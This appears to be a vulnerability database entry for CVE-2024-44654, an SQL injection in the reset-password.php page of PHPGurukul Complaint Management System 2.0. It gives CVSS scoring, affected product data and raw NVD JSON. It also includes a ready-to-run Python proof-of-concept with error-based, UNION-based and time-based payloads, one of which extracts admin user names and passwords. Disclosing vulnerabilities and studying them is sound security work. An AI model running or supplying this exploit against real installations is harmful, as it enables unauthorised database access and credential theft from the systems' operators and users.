Security Vulnerability Report
中文
CVE-2024-44654 CVSS 6.5 MEDIUM

CVE-2024-44654

Published: 2025-11-17 19:16:16
Last Modified: 2025-11-18 20:47:26

Description

PHPGurukul Complaint Management System 2.0 is vulnerable to SQL Injection via the email and mobileno parameters in reset-password.php.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:complaint_management_system:2.0:*:*:*:-:*:*:* - VULNERABLE
PHPGurukul Complaint Management System 2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2024-44654 SQL Injection PoC # Target: PHPGurukul Complaint Management System 2.0 # Vulnerable Parameter: email, mobileno in reset-password.php TARGET_URL = "http://target.com/complaint/reset-password.php" def test_sqli_basic(): """Test basic SQL injection with single quote""" payload = "'" data = { "email": payload, "mobileno": "1234567890", "submit": "Submit" } try: response = requests.post(TARGET_URL, data=data, timeout=10) # Check for SQL error messages in response if "SQL" in response.text or "mysql" in response.text.lower() or "syntax" in response.text.lower(): print("[+] SQL Injection vulnerability confirmed!") return True except Exception as e: print(f"[-] Error: {e}") return False def extract_admin_credentials(): """Extract admin credentials using UNION-based injection""" # This payload attempts to extract data from users table payload = "' UNION SELECT 1,2,3,4,5,6,user_name,user_password,email,9,10,11 FROM users LIMIT 1-- -" data = { "email": payload, "mobileno": "1234567890", "submit": "Submit" } try: response = requests.post(TARGET_URL, data=data, timeout=10) print("[*] Extracting data...") # Parse response to extract credentials # In real attack, parse response.text for extracted data print(response.text[:500]) except Exception as e: print(f"[-] Error: {e}") def blind_sqli_test(): """Test blind SQL injection using time-based technique""" # Time-based blind injection payload payload = "' OR SLEEP(5)-- -" data = { "email": payload, "mobileno": "1234567890", "submit": "Submit" } try: response = requests.post(TARGET_URL, data=data, timeout=15) print("[*] Response received") except requests.exceptions.Timeout: print("[+] Time-based blind SQL injection confirmed!") if __name__ == "__main__": print("CVE-2024-44654 SQL Injection PoC") print("=" * 50) if len(sys.argv) > 1: TARGET_URL = sys.argv[1] print(f"[*] Target: {TARGET_URL}") if test_sqli_basic(): print("[*] Proceeding with data extraction...") extract_admin_credentials() blind_sqli_test()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-44654", "sourceIdentifier": "[email protected]", "published": "2025-11-17T19:16:15.720", "lastModified": "2025-11-18T20:47:26.243", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PHPGurukul Complaint Management System 2.0 is vulnerable to SQL Injection via the email and mobileno parameters in reset-password.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:complaint_management_system:2.0:*:*:*:-:*:*:*", "matchCriteriaId": "8C6D9515-0DC3-4727-B5B5-2E6C34362BF7"}]}]}], "references": [{"url": "https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44654.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/complaint-management-sytem", "source": "[email protected]", "tags": ["Product"]}]}}